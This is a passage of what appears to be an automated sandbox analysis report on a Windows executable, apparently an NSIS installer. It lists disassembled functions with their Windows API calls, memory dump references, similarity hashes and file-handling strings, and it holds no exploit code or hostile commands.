                                                                                                                                                  • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                  • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                                                                  • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                  • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                                                                  Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                  • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                  • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                                                                  • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                  • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                                                                  Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                  • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                  • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                                                                  • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                  • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                                                                  Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                  • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                  • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                                                                  • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                  • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                                                                  Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                  • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                  • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                                  • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                  • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                                                                                                  Function 00403859 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CloseHandle.KERNELBASE(FFFFFFFF,00403AD1,?), ref: 00403864
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                  • Opcode ID: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
                                                                                                                                                  • Instruction ID: b9bdbc8744521ee651ba7bc90111acac5a2c88e2b86e9c74d328a3688b9dc09a
                                                                                                                                                  • Opcode Fuzzy Hash: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
                                                                                                                                                  • Instruction Fuzzy Hash: 7BC0223810020092E1242F34AE0EB063A04F740330F500B3EF0F2F02F0D73C8640006D

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                  • String ID: $ @$M$N
                                                                                                                                                  • API String ID: 1638840714-3479655940
                                                                                                                                                  • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                                                                  • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                                  • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                                                                  • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                                  Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                  • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                  • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                  • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                    • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                    • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                  • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                  • String ID: 82D$@%F$@rD$A
                                                                                                                                                  • API String ID: 3347642858-1086125096
                                                                                                                                                  • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                                                                  • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                                  • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                                                                  • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                                  Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                  • API String ID: 1916479912-1189179171
                                                                                                                                                  • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                  • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                                  • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                  • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                                  Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                  • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                  • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                  • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                  • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                  Strings
                                                                                                                                                  • \*.*, xrefs: 00406D03
                                                                                                                                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                  • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                  • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
